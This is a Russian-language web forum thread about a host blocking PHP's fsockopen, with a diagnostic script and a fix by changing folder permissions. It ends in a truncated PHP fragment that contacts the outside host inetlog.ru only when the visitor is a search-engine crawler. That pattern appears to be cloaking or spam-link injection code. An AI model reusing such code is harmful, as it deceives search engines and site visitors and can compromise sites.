Follow along with the video below to see how to install our site as a web app on your home screen.
Примечание: This feature may not be available in some browsers.
У хостера прикрыта возможность работать через fsockopen, выдает 500-ю ошибку. Что можна использовать вместо этого?
<?php
header('Content-type: text/plain');
error_reporting(E_ALL);
ini_set('display_errors',true);
echo ini_get('disable_functions');
echo ini_get('suhosin.executor.func.blacklist');
хм... что не понят вроде 777 это без ограничений а 755 наоборот ограничения ну да ладно...вопрос решен, проблема была в правах на папку, стояло 777, а помогло 755
$ag = $_SERVER["HTTP_USER_AGENT"];
if (strstr($ag, 'Google') || strstr($ag, 'Yandex') || strstr($ag, 'YaDirectBot') || strstr($ag, 'Rambler')) {
$fp = @fsockopen("inetlog.ru", 80, $errno, $errstr, 10);
if($fp) {